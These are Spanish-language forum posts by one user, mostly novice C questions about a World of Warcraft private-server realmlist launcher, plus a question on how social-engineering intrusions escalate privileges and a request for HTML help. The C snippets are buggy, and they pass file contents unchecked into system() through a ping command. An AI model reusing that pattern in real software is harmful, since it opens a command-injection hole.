No pido que me traduzcais nada solo que me indiqueis algun programa para hacerlo.


Saludos Søra



edito: JODER pasadmelo al subforo ASM que no lo he visto antes

Muchos de los libros interesantes que andan por la red ya sean los de kevin mitnik, la biblia hacker u otros que no tienen un autor o titulo tan destacado en algun apartado u otro explican la increible hazaña de chico1 que mediante ingenieria social sacan la contraseña de un hotel/empresa/universidad luego instalan un sniffer y intentan atrapar contraseñas de mas alto nivel para ir escalando asta sacar la del admin.

Pues mi duda esta en que si a ti te dan la contraseña de un alumno de universidad tendras acceso a datos limitados descargar examenes, apuntes,etc... pero nada de instalar sniffers ni otras cosas no?

Si es de un hotel pues ya se entiende mas pero aun asi si consigues la de un miembro que tenga asociada una tarjeta de credito se daran cuenta de que lo has gastado tu y tampoco puedes instalar ujn sniffer ya que no tienes ningun privilegio.

Si es de empresa pues si empiezas por algo muy bajo tampoco creo que tengas capacidad de instalar nada remotamente.


Entonces como se hace para con pocos privilegios conseguir algo mas que apuntes para examenes???
Otra duda cuando dicen  hablaron con la dependienta del hotel y le consiguieron sacar los datos necesarios para conseguir entrar en el sistema. ¿Que datos piden de que tipo: tipo usuarios corrientes, algo que va con el hardware o que?

Saludos Søra.

pd:tranquilos no pienso hacer nada malo pero me surgen todas esas dudas.

He estado buscando explicacion a un problema que tengo pero no se que narices le pasa imaginen yo tengo un archivo llamado Realmlist.wtf en el cual pone:

wowsulvus.no-ip.biz
exirn.servegame.com

y cuando ejecuto este codigo no me lee la primera linea pasa directamente a la segunda o.O'

Código (c) [Seleccionar] Expandir

#include <stdio.h>
main()
{
printf(" _       _         _       _     ______         _               _     _ \n");
printf("(_)  _  (_)       (_)  _  (_)   (______)       (_) _           (_)   (_)\n");
printf("(_) (_) (_)  ___  (_) (_) (_)   (_)__    _   _  _ (_)__  _   _ (__)_ (_)\n");
printf("(_) (_) (_) (___) (_) (_) (_)   (____)  (_)_(_)(_)(____)(_) (_)(_)(_)(_)\n");
printf("(_)_(_)_(_)(_)_(_)(_)_(_)_(_)   (_)____   (_)  (_)(_)   (_)_(_)(_)  (__)\n");
printf(" (__) (__)  (___)  (__) (__)    (______)(_) (_)(_)(_)    (___) (_)   (_)\n");
printf("-----------------------------------------------------------------By Sora\n");
printf("Comprobando disponibilidad de realmlists:\n");
printf("------------------------------------------------------------------------\n");
printf("------------------------------------------------------------------------\n");

   char bufferealm[40];
   FILE *pf;
   pf = fopen("Realmlist.wtf","r+");
   if (pf==NULL) {
       printf("No has configurado WEL debes ejecutar el archivo Configure.exe");
   }
   
   while (fgets(bufferealm,40,pf) != NULL);
   {
     
      char buffer[50];
      sprintf(buffer, "ping -w 4 %s", bufferealm);
      if (system(buffer) == 0) {
         FILE *df;
         df = fopen("C:\\Archivos de programa\\World of warcraft\\Data\\esES\\realmlist.wtf","w");
         char buffertres[50];
         sprintf(buffertres,"set realmlist %s",bufferealm);
         fprintf(df,"%s",buffertres);
         printf("------------------------------------------------------------------------\n");
         printf("------------------------------------------------------------------------\n");
         printf("%s esta encendido y el realmlist ya esta cambiado\n",&bufferealm);
         
         printf("Lanzando paginas de votos...\n");
         system("firefox http://www.google.es");
         system("firefox http://www.google.es");
         printf("------------------------------------------------------------------------\n");
         printf("------------------------------------------------------------------------\n");


         printf("Lanzando World Of Warcraft\n");
         execl("C:\\Archivos de prorgama\\World of Warcraft\\Wow.exe","Wow.exe",0);
         return 0;}

         else {
         printf("%s se encuentra apagado WEL pasara al siguiente realmlist\n",&bufferealm);
         
           }
    }
     
 
 
}

Espero que no les resulten muy pesadas mis preguntas..

Saludos Søra.

Ola perdon por abrir tantos temas pero son dudas diferentes y tambien perdon por no dejaros responder XD pero me asaltan las dudas y no puedo evitar preguntar, esque cuando google no me soluciona algo o pregunto o me quedo atascado.

Tengo una duda con el siguiente codigo:

Código (c) [Seleccionar] Expandir

#include <stdio.h>
main()
{
printf(" _       _         _       _     ______         _               _     _ \n");
printf("(_)  _  (_)       (_)  _  (_)   (______)       (_) _           (_)   (_)\n");
printf("(_) (_) (_)  ___  (_) (_) (_)   (_)__    _   _  _ (_)__  _   _ (__)_ (_)\n");
printf("(_) (_) (_) (___) (_) (_) (_)   (____)  (_)_(_)(_)(____)(_) (_)(_)(_)(_)\n");
printf("(_)_(_)_(_)(_)_(_)(_)_(_)_(_)   (_)____   (_)  (_)(_)   (_)_(_)(_)  (__)\n");
printf(" (__) (__)  (___)  (__) (__)    (______)(_) (_)(_)(_)    (___) (_)   (_)\n");
printf("------------------------------------------------------------------------\n");
printf("Comprobando disponibilidad de realmlists:\n");

  char bufferealm[40];
  FILE *pf;
  pf = fopen("Realmlist.wtf","r");
  if (pf==NULL) {
      printf("No has configurado WEL debes ejecutar el archivo Configure.exe");
  }
 
  while (fgets(bufferealm,40,pf) != NULL);
  {
     char buffer[50];
     sprintf(buffer, "ping -w 4 %s", bufferealm);
     if (system(buffer) == 0) {
        printf("%s se encuentra apagado WEL pasara al siguiente realmlist",&bufferealm); }
     else {
        FILE *df;
        df = fopen("C:\\Archivos de programa\\World of warcraft\\Data\\esES\\realmlist.wtf","w");
        fprintf(df,"%s",bufferealm);
        printf("%s esta encendido y el realmlist ya esta cambiado",&bufferealm);
        return 0;
        }
   }

Yo he puesto ese while ai con idea de que valla poniendo en el bufferealm solo los datos que obtenga cuando fgets(bufferealm,40,pf) no sea una linea en blanco pero despues releyendo la sintaxis de while no se si funcionara bien o no y ahora mismo no tengo un compilador para probarlo ya que no estoy en mi PC....... perdon de nuevo por poner tantos temas seguidos.

SOLUCIONADO: Tenia yo razon si que funciona como yo esperaba.


Saludos Søra.

edito: vale me he descargado un compilador y creo que funciona bien lo unico es que miren lo que pasa cuando ago ping a un servidor que esta apagado:

Código [Seleccionar] Expandir

~/Escritorio/C/Wow$ ./a.out
_       _         _       _     ______         _               _     _
(_)  _  (_)       (_)  _  (_)   (______)       (_) _           (_)   (_)
(_) (_) (_)  ___  (_) (_) (_)   (_)__    _   _  _ (_)__  _   _ (__)_ (_)
(_) (_) (_) (___) (_) (_) (_)   (____)  (_)_(_)(_)(____)(_) (_)(_)(_)(_)
(_)_(_)_(_)(_)_(_)(_)_(_)_(_)   (_)____   (_)  (_)(_)   (_)_(_)(_)  (__)
(__) (__)  (___)  (__) (__)    (______)(_) (_)(_)(_)    (___) (_)   (_)
------------------------------------------------------------------------
Comprobando disponibilidad de realmlists:
ping: unknown host set
set realmlis exirun.servegame.com
esta encendido y el realmlist ya esta cambiado


SOLUCIONADO: Entendi al reves si da 0 es que existe si da diferente de 0 no existe y no al reves

Saludos Søra.


edito2: Y por cierto cuando indico la ruta del realmlist en el

df = fopen("C:\\Archivos de programa\\World of warcraft\\Data\\esES\\realmlist.wtf","w");

lo que hace es crearme un archivo con ese nombre. Es porque estoy en linux y la ruta no existe o aunque existiera la ruta me iba a hacer lo mismo?????

SOLUCIONADO: Segun he leido es porque no existe la ruta no porque este mal


Saludos Søra.

Tengo un problema con la funcion fgets y es que al imprimir los datos introducidos por el teclado e un archivo me deja la primera linea en blanco, entonces cuando voy a cojer con la funcion fgets la primera linea del archivo me encuentro con una linea vacia:

Aqui al imprimir en el archivo:

Código (c) [Seleccionar] Expandir

   for(i=-1; i<a; i++) {
     char realmlist[40];
     fgets (realmlist,40,stdin);
     FILE *df;
     df = fopen ("Realmlist.wtf","a");
     fprintf(df,"%s",realmlist);
     fclose(df); }

Aqui al cojer la primera linea:

Código (c) [Seleccionar] Expandir

  char bufferealm[40];
  FILE *pf;
  pf = fopen("Realmlist.wtf","r");
  if (pf==NULL) {
      printf("No has configurado WEL debes ejecutar el archivo Configure.exe");
  }
 
  fgets(bufferealm,40,pf);
  printf("%s",bufferealm);


Saludos Søra.

edito: SOLUCIONADO despues de un ratito de busqueda (1h) ya lo he solucionado.

Ola a todos no me suelo pasar mucho por este subforo pero ahora con tanto tiempo libre pues e me ha ocurrido ponerme a programar en C asi pues estoy haciendo un codigo para un servidor de wow una especie de launcher que te permita poner una lista de realmlist ordenados para ir cambiando entre ellos cuando alguno no este on.

Bueno que me enrollo demasiado espero que lo hayais entendido, bueno aqui les dejo mi codigo:

Código (c) [Seleccionar] Expandir

#include <stdio.h>
main()
{

printf(" _       _         _       _     ______         _               _     _ \n");
printf("(_)  _  (_)       (_)  _  (_)   (______)       (_) _           (_)   (_)\n");
printf("(_) (_) (_)  ___  (_) (_) (_)   (_)__    _   _  _ (_)__  _   _ (__)_ (_)\n");
printf("(_) (_) (_) (___) (_) (_) (_)   (____)  (_)_(_)(_)(____)(_) (_)(_)(_)(_)\n");
printf("(_)_(_)_(_)(_)_(_)(_)_(_)_(_)   (_)____   (_)  (_)(_)   (_)_(_)(_)  (__)\n");
printf(" (__) (__)  (___)  (__) (__)    (______)(_) (_)(_)(_)    (___) (_)   (_)\n");


printf("----------------------------------------------------------\n");
printf("Configurando WoW-ExiruN-Launcher\n");
printf("----------------------------------------------------------\n");

int a,i;

printf("W-E-L te permite crear una lista de realmlist alternativos\n");
printf("de manera que si tu servidor favorito esta off pasara\n");
printf("a los siguientes servidores que hallas indicado\n");
printf("----------------------------------------------------------\n");
printf("Indica el numero de realmlist que quieres poner\n");
scanf("%i", &a);
printf("Introduce los realmlist\n");

    for(i=0; i++; i<a) {
      char realmlist[30];
      fgets (realmlist,30,stdin);
      FILE *df;
      df = fopen ("Realmlist.wtf","r+b");
      fprintf(df,"%s",realmlist);
      fclose(df); }

}

la cosa es que no me ejecuta el for por lo que no puedo guardar los realmlist y no funciona mi programa.

Y despues de todo esto deciros que no he encontrado ninguna manera de borrar archivos o reescribirlos en C lo cual frena mi programa.

Saludos Søra.

Ola a todos soi nuevo en este foro y un amigo me ha ofrecido la posibilidad de montar y mantener su pagina web tiene una empresa pequeña, yo le he dicho que me diera tiempo y bueno me ha dado un mes....

Mi objetivo es en un mes aprender HTML y PHP como poco, y despues javascript.
La cosa es que he empezado con el HTML y todos los manuales son muy básicos como hacer un Formulario es lo mas complicado que he encontrado y por supuesto no he encontrado como hacer un CGI (Common Gateway Interface) (contando que solo se C y tampoco mucho).

Asi que busco alguien que me pueda poner el enlace a algún manual "avanzado" de HTML o alguien que me enseñe lo básico ya sea por correo o por el foro.

Antes de que respondais decir que he buscado en google y que tengo 7 u 8 manuales de HTML en el ordenador y como último recurso pido que trabajeis vosotros. Bueno un saludo Søra.